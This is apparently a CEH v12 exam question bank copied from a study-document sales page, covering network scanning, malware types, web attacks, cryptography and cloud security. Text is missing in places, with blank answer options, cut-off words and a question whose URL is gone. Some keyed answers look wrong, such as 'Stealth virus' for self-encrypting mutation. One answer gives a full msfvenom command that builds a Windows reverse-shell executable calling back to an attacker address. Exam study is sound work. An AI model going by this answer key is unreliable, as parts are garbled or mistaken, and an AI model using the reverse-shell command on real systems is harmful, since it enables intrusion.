A) SAST
B) IAST
C) DAST
D) MAST
Answer: SAST

Ferdinand installs a virtual communication tower between the two authentic endpoints to mislead the victim. What attack does Ferdinand perform?
A) aLTEr
B) Aspidistra
C) Wi-Jacking
D) Sinkhole
Answer: aLTEr

Which of the following options is a security feature on switches that leverages the DHCP snooping database to help prevent man-in-the-middle attacks?
A) DAI
B) Spanning tree
C) DHCP relay
D) Port security
Answer: DAI

Which of the following incident handling process phases is responsible for defining rules, training employees, creating a back-up, and preparing software and hardware resources before an incident occurs?
A) Preparation
B) Containment
C) Identification
D) Recovery
Answer: Preparation

Rajesh, a network administrator, found several unknown files in the root directory of his FTP server. He was very interested in a binary file named "mfs".
Rajesh decided to check the FTP server logs and found that the anonymous user account logged in to the server, uploaded the files and ran the script using a function provided by the FTP server's software. Also, he found that the "mfs" file is running as a process and is listening on a network port. What kind of vulnerability must exist to make this attack possible?
A) Directory traversal
B) Privilege escalation
C) File system permissions
D) Brute force login
Answer: File system permissions

Which of the following characteristics is not true about the Simple Object Access Protocol?
A) Exchanges data between web services
B) Only compatible with the application protocol HTTP
C) Using extensible markup language
D) Allows for any programming model
Answer: Only compatible with the application protocol HTTP

Determine which of the following is the type of honeypot that simulates the real production network of the target organization.
A) High-interaction honeypots
B) Pure honeypots
C) Research honeypots
D) Low-interaction honeypots
Answer: Pure honeypots

Which type of virus tries to hide from antivirus programs by actively changing and corrupting the chosen service call interruptions when they are being run?
A) Tunneling virus
B) Polymorphic virus
C) Stealth/Tunneling virus
D) Cavity virus
Answer: Stealth/Tunneling virus

alert tcp any any -> 10.199.10.3 21 (msg: "FTP on the network!";)
Which system usually uses such a configuration setting?
A) FTP server rule
B) Firewall IPTable
C) IDS
D) Router IPTable
Answer: IDS

What are the two main conditions for a digital signature?
A) It has to be the same number of characters as a physical signature and must be unique
B) Legible and neat
C) Unforgeable and authentic
D) Unique and have special characters
Answer: Unforgeable and authentic

You need to assess the system used by your employee. During the assessment, you found that compromise was possible through user directories, registries, and other system parameters.
Also, you discovered vulnerabilities such as native configuration tables, incorrect registry or file permissions, and software configuration errors. Which of the following types of vulnerability assessment did you conduct?
A) Host-based assessment
B) Credentialed assessment
C) Distributed assessment
D) Database assessment
Answer: Host-based assessment

At which of the following stages of the cyber kill chain does data exfiltration occur?
A) Installation
B) Weaponization
C) Actions on objectives
D) Command and control
Answer: Actions on objectives

Identify the correct syntax for ICMP scan on a remote computer using hping2.
A) hping2 --set-ICMPP
B) hping2
C) hping2 --I
D) hping2 -1
Answer: hping2 -1

You found that sensitive data, employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. Which of the following protocols, which can send data using encryption and digital certificates, will help solve this problem?
A) IP
B) FTP
C) HTTPS
D) FTPS
Answer: FTPS

Marketing department employees complain that their computers are working slowly and every time they attempt to go to a website, they receive a series of pop-ups with advertisements. Which of the following types of malware infected their systems?
A) Virus
B) Spyware
C) Adware
D) Trojan
Answer: Adware

Ivan, the evil hacker, decided to use Nmap to scan open ports and running services on systems connected to the target organization's OT network. For his purposes, he enters the Nmap command into the terminal which identifies Ethernet/IP devices connected to the Internet and further gathers information such as the vendor name, product code and name, device name, and IP address. Which of the following commands did Ivan use in this scenario?
A) nmap -Pn -sT -p 46824 <target IP>
B) nmap -Pn -sU -p 44818 --script enip-info <target IP>
C) nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p <port list> <target IP>
D) nmap -Pn -sT -p 102 --script s7-info <target IP>
Answer: nmap -Pn -sU -p 44818 --script enip-info <target IP>

Which of the following types of attack (that can use either HTTP GET or HTTP POST) allows an attacker to induce users to perform actions that they do not intend to perform?
A) Cross-Site Scripting
B) SQL Injection
C) Cross-Site Request Forgery
D) Browser Hacking
Answer: Cross-Site Request Forgery

John sent a TCP ACK segment to a known closed port on a firewall, but it didn't respond with an RST. What conclusion can John draw about the firewall he scanned?
A) It's a non-stateful firewall
B) John can't draw any conclusions based on this information
C) It's a stateful firewall
D) There is no firewall
Answer: It's a stateful firewall

The medical company has recently experienced security breaches. After this incident, their patients' personal medical records became available online and easily found using Google. Which of the following standards has the medical organization violated?
A) PCI DSS
B) PII
C) HIPAA/PHI
D) ISO 2002
Answer: HIPAA/PHI

Identify the attack by description: When performing this attack, an attacker installs a fake communication tower between two authentic endpoints to mislead a victim. He uses this virtual tower to interrupt the data transmission between the user and the real tower, attempting to hijack an active session. After that, the attacker receives the user's request and can manipulate the virtual tower traffic and redirect a victim to a malicious website.
A) Wardriving
B) Jamming signal attack
C) aLTEr attack
D) KRACK attack
Answer: aLTEr attack

Which of the following encryption algorithms is a symmetric key block cipher that has a 128-bit block size, and its key size can be up to 256 bits?
A) IDEA
B) Blowfish
C) HMAC
D) Twofish
Answer: Twofish

A competitor organization has hired a professional hacker who could collect sensitive information about your organization. The hacker starts by gathering the server IP address of the target organization using Whois footprinting. After this, he entered the server IP address as an input to an online tool to retrieve information such as your organization's network range and identify the network topology and operating system used in the network. Which of the following tools did the hacker use for this purpose?
A) Baidu
B) AOL
C) DuckDuckGo
D) ARIN
Answer: ARIN

You need to identify the OS of the target host. You want to use the Unicornscan tool to do this. As a result of using the tool, you got the TTL value and determined that the target system is running a Windows OS. Which of the following TTL values did you get when using the program?
A) 255
B) 138
C) 128
D) 64
Answer: 128

Which of the following Nmap commands performs a stealth scan?
A) nmap -sU
B) nmap -sS
C) nmap -sM
D) nmap -sT
Answer: nmap -sS

Identify the attack by description: The attacker decides to attack IoT devices. First, he will record the frequency required to share information between connected devices. Once he gets the necessary frequency, the attacker will capture the original data when the connected devices initiate commands. As soon as he collects original data, he will use tools such as URH to segregate the command sequence. The final step in this attack will be to start injecting the segregated command sequence on the same frequency into the IoT network, which repeats the captured signals of the devices.
A) Side-channel attack
B) Reconnaissance attack
C) Cryptanalysis attack
D) Replay attack
Answer: Replay attack

You are the head of the Network Administrators department. One of your subordinates uses SNMP to manage networked devices from a remote location.
To manage network nodes, your subordinate uses MIB, which contains formal descriptions of all network objects managed by SNMP. He accesses the contents of MIB by using a web browser either by entering the IP address and L or by entering the DNS library name and L. You know that your subordinate can retrieve information from a MIB that contains object types for workstations and server services. Which of the following types of MIB will your subordinate use to retrieve information about types for workstations and server services?
A) DHCP.MIB
B) WINS.MIB
C) MIB_II.MIB
D) LNMIB2.MIB
Answer: LNMIB2.MIB

Justin, the evil hacker, wants to steal Joanna's data. He sends Joanna an email with a malicious link that looks legitimate. Joanna unknowingly clicks on the link, and it redirects her to a malicious web page, and John steals Joanna's data. Which of the following attacks is described in this scenario?
A) Phishing
B) DDoS
C) Vishing
D) Spoofing
Answer: Phishing

The attacker plans to compromise the systems of organizations by sending malicious emails. He decides to use the tool to track the target's emails and collect information such as senders' identities, mail servers, sender IP addresses, and sender locations from different public sources. It also checks email addresses for leaks using API. Which of the following tools is used by the attacker?
A) ZoomInfo
B) Factiva
C) Netcraft
D) Infoga
Answer: Infoga

You need to describe the principal characteristics of the vulnerability and make a numerical estimate reflecting its severity using CVSS v3.0 to properly assess and prioritize the organization's vulnerability management processes. As a result of the research, you received a basic score of 4.0 according to CVSS rating. What is the CVSS severity level of the vulnerability discovered?
A) Medium
B) Critical
C) Low
D) High
Answer: Medium

Johnny decided to gather information for identity theft from the target organization. He wants to redirect the organization's web traffic to a malicious website.
After some thought, he plans to perform DNS cache poisoning by exploiting the vulnerabilities in the DNS server software and wants to modify the original IP address of the target website to that of a malicious website. Which of the following techniques does Johnny plan to use?
A) Pretexting
B) Pharming
C) Skimming
D) Wardriving
Answer: Pharming

You have detected an abnormally large amount of traffic coming from local computers at night. You decide to find out the reason, do a few checks and find that an attacker has exfiltrated user data. Also, you noticed that AV tools could not find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs. Which of the following types of malware did the attacker use to bypass your company's application whitelisting?
A) Fileless malware
B) Phishing malware
C) Logic bomb malware
D) Zero-day malware
Answer: Fileless malware

Imagine the following scenario: The hacker monitored and intercepted already established traffic between the victim and a host machine to predict the victim's ISN. The hacker sent spoofed packets with the victim's IP address to the host machine using the ISN. After this manipulation, the host machine responded with a packet having an incremented ISN. The victim's connection was interrupted, and the hacker was able to connect with the host machine on behalf of the victim. Which of the following attacks did the hacker perform?
A) TCP/IP hijacking
B) UDP hijacking
C) Forbidden attack
D) Blind hijacking
Answer: TCP/IP hijacking

Which of the following attacks can you perform if you know that the web server handles the "(../)" (character string) incorrectly and returns the file listing of a folder structure of the server?
A) Denial of service
B) SQL injection
C) Cross-site scripting
D) Directory traversal
Answer: Directory traversal

Identify the phase of the APT lifecycle that the hacker is in at the moment according to the scenario given below: The hacker prepared for an attack and attempted to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Thanks to the successful attack, he deployed malware on the target system to establish an outbound connection and began to move on.
A) Preparation
B) Initial intrusion
C) Persistence
D) Cleanup
Answer: Initial intrusion

The attacker is performing the footprinting process. He checks publicly available information about the target organization by using the Google search engine. Which of the following advanced operators will he use to restrict the search to the organization's web domain?
A) [link:]
B) [site:]
C) [location:]
D) [allinurl:]
Answer: [site:]

You enter the following command to get the necessary data:
ping -* 6 192.168.120.114
Output:
Pinging 192.168.120.114 with 32 bytes of data:
Reply from 192.168.120.114: bytes=32 time<1ms TTL=128
Reply from 192.168.120.114: bytes=32 time<1ms TTL=128
Reply from 192.168.120.114: bytes=32 time<1ms TTL=128
Reply from 192.168.120.114: bytes=32 time<1ms TTL=128
Reply from 192.168.120.114: bytes=32 time<1ms TTL=128
Reply from 192.168.120.114: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.120.114
Packets: Sent = 6, Received = 6, Lost = 0 (0% loss).
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Which of the following flags is hidden under "*"?
A) a
B) n
C) s
D) t
Answer: n

Which of the following SQLi types leverages a database server's ability to make DNS requests to pass data to an attacker?
A) In-band SQLi
B) Time-based blind SQLi
C) Out-of-band SQLi
D) Union-based SQLi
Answer: Out-of-band SQLi

According to Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, which of the following ranges is the medium?
A) 3.9-6.9
B) 4.0-6.0
C) 3.0-6.9
D) 4.0-6.9
Answer: 4.0-6.9

Which of the following is an iOS jailbreaking technique that patches the kernel during the device boot to keep it jailbroken after each reboot?
A) Untethered jailbreaking
B) Semi-untethered jailbreaking
C) Tethered jailbreaking
D) Semi-tethered jailbreaking
Answer: Untethered jailbreaking

You were instructed to check the configuration of the webserver and you found that the server permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2 connections. You understand that this vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key information. Which of the following attacks can an attacker perform using this vulnerability?
A) Padding oracle attack
B) DUHK attack
C) DROWN attack
D) Side-channel attack
Answer: DROWN attack

Which of the following is an API designed to reduce complexity and increase the integrity of updating and changing, which uses a web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application?
A) REST API
B) JSON-RPC
C) SOAP API
D) RESTful API
Answer: RESTful API

Your organization has a public key infrastructure set up. Your colleague Bernard wants to send a message to Joan. Therefore, Bernard both encrypts the message and digitally signs it. Bernard uses ____ to encrypt the message for these purposes, and Joan uses ____ to confirm the digital signature.
A) Joan's public key; Bernard's public key
B) Joan's private key; Bernard's public key
C) Bernard's public key; Bernard's public key
D) Joan's public key; Joan's public key
Answer: Joan's public key; Bernard's public key

Which of the following files determines the basic configuration in an Android application, such as broadcast receivers, services, etc.?
A)
B)
C) AndroidM
D) APK.info
Answer: AndroidM

You must bypass the firewall. To do this, you plan to use DNS to perform data exfiltration on an attacked network. You embed malicious data into the DNS protocol packets. DNSSEC can't detect these malicious data, and you successfully inject malware to bypass a firewall and maintain communication with the victim machine and C&C server. Which of the following techniques would you use in this scenario?
A) DNS cache snooping
B) DNS tunneling
C) DNS enumeration
D) DNSSEC zone walking
Answer: DNS tunneling

You want to make your life easier and automate the process of updating applications. You decide to use a user-defined HTTP callback or push APIs that are raised based on trigger events. When this feature is invoked, data is supplied to other applications so that users can instantly receive real-time information. What is the name of this technique?
A) Web shells
B) REST API
C) SOAP API
D) Webhooks
Answer: Webhooks

Identify the protocol used to secure an LDAP service against anonymous queries.
A) SSO
B) RADIUS
C) NTLM
D) WPA
Answer: NTLM

Ron, the hacker, is trying to crack an employee's password of the target organization utilizing a rainbow table. During the break-in, he discovered that upon entering a password, extra characters are added to the password after submitting. Which of the following countermeasures is the target company using to protect against rainbow tables?
A) Password key hashing
B) Account lockout
C) Password hashing
D) Password salting
Answer: Password salting

Your company has hired Jack, a cybersecurity specialist, to conduct another pentest. Jack immediately decided to get to work.
He launched an attack on the DHCP servers by broadcasting forged DHCP requests and leased all the DHCP addresses available in the DHCP scope until the server could not issue any more IP addresses. As a result of these actions, a DDoS attack occurred, and legitimate employees could not access the company's network. Which of the following attacks did Jack perform?
A) VLAN hopping
B) DHCP starvation
C) Rogue DHCP server attack
D) STP attack
Answer: DHCP starvation

Which of the following tiers in the three-tier application architecture is responsible for moving and processing data between them?
A) Data tier
B) Application tier
C) Logic tier
D) Presentation tier
Answer: Logic tier

As usual, you want to open your online banking from your home computer. You enter the URL into your browser. The website is displayed and prompts you to re-enter your credentials as if you have never visited the site before. You decide to check the URL of the website and notice that the site is not secure and the web address appears different. Which of the following types of attacks have you been exposed to?
A) ARP cache poisoning
B) DHCP spoofing
C) DoS attack
D) DNS hijacking
Answer: DNS hijacking

You want to execute an SQLi attack. The first thing you check is testing the response time of a true or false response. Secondly, you want to use another command to determine whether the database will return true or false results for user IDs. Which two SQL injection types have you tried to perform?
A) Out of band and boolean-based
B) Union-based and error-based
C) Time-based and union-based
D) Time-based and boolean-based
Answer: Time-based and boolean-based

Recently your company set up a cloud computing service. Your system administrator reached out to a telecom company to provide Internet connectivity and transport services between the organization and the cloud service provider to implement this service.
Which category does the telecom company fall into in the above scenario according to NIST cloud deployment reference architecture?
A) Cloud auditor
B) Cloud carrier
C) Cloud broker
D) Cloud consumer
Answer: Cloud carrier

Which of the following types of virus avoids detection by changing its own code and then ciphering itself multiple times as it replicates?
A) Tunneling virus
B) Encryption virus
C) Cavity virus
D) Stealth virus
Answer: Stealth virus

Your organization's network uses the network address 192.168.1.64 with mask 255.255.255.192, and servers in your organization's network are in the addresses 192.168.1.140, 192.168.1.141 and 192.168.1.142. The attacker who wanted to find them couldn't do it. He used the following command for the network scanning:
nmap 192.168.1.64/28
Why couldn't the attacker find these servers?
A) He needs to add the command "ip address" just before the IP address
B) He is scanning from 192.168.1.64-192.168.1.78 because of the mask /28 and the servers are not in that range
C) The network must be drawn and the nmap command and IP address are ok
D) He needs to change the address to 192.168.1.0 with the same mask
Answer: He is scanning from 192.168.1.64-192.168.1.78 because of the mask /28 and the servers are not in that range

Identify the technique by description: The attacker wants to create a botnet. Firstly, he collects information about a large number of vulnerable machines to create a list. Secondly, he infects the machines. The list is divided by assigning half of the list to the newly compromised machines. The scanning process runs simultaneously. This technique ensures a very fast spreading and installation of malicious code.
A) Permutation scanning technique
B) Topological scanning technique
C) Subnet scanning technique
D) Hit-list scanning technique
Answer: Hit-list scanning technique

Which of the following AAA protocols can be used for authenticating users connecting via analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay network?
A) RADIUS
B) Kerberos
C) TACACS
D) DIAMETER
Answer: RADIUS

According to the configuration of the DHCP server, only the last 100 IP addresses are available for lease in subnet 10.1.4.0/23. Which of the following IP addresses is in the range of the last 100 addresses?
A) 10.1.4.254
B) 10.1.5.200
C) 10.1.3.156
D) 10.1.155.200
Answer: 10.1.5.200

The attacker wants to attack the target organization's Internet-facing web server. In case of a successful attack, he will also get access to back-end servers protected by a firewall. The attacker plans to use URL
Which of the following types of attacks is the attacker planning to perform?
A) Web server misconfiguration
B) Server-side request forgery attack
C) Website defacement
D) Web cache poisoning atta


Document information

Institution: CEH V12
Course: CEH V12
Uploaded on: June 30, 2025
Number of pages: 12
Written in: 2024/2025
Type: Exam
Contains: Questions and answers

Content preview

CEH V12 Exam (Latest 2025/ 2026 Update) Certified
Ethical Hacker | Questions and Answers | Grade A|
100% Correct (Verified Answers)

Question:
Susan, a software developer, wants her web API to update other applications with the latest
information. For this purpose, she uses a user-defined HTTP callback or push APIs that are raised
based on trigger events: when invoked, this feature supplies data to other applications so that
users can instantly receive real-time information. Which of the following techniques is employed
by Susan?

Answer:
Webhooks




Question:
Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices
hidden by a restrictive firewall in the IPv4 range in a given target network. Which of the
following host discovery techniques must he use to perform the given task?

Answer:
arp ping scan




Question:
Alice, a professional hacker, targeted an organization's cloud services. She infiltrated the target's
MSP provider by sending spear-phishing emails and distributed custom-made malware to
compromise user accounts and gain remote access to the cloud service. Further, she accessed the
target customer profiles with her MSP account, compressed the customer data, and stored them
in the MSP. Then, she used this information to launch further attacks on the target organization.
Which of the following cloud attacks did Alice perform in the above scenario?

Answer:
Cloud hopper attack

Question:
Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in
the application she is working on. She utilizes a component that can process API requests and
handle various Docker objects, such as containers, volumes, images, and networks. What is the
component of the Docker architecture used by Annie in the above scenario?

Answer:
Docker daemon




Question:
What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?

Answer:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe




Question:
Which of the following information security controls creates an appealing isolated environment
for hackers to prevent them from compromising critical targets while simultaneously gathering
information about the hacker?

Answer:
Honeypot




Question:
Infecting a system with malware and using phishing to gain credentials to a system or web
application are examples of which phase of the ethical hacking methodology?

Answer:

Meet the seller

ProfGoodlucK Rasmussen College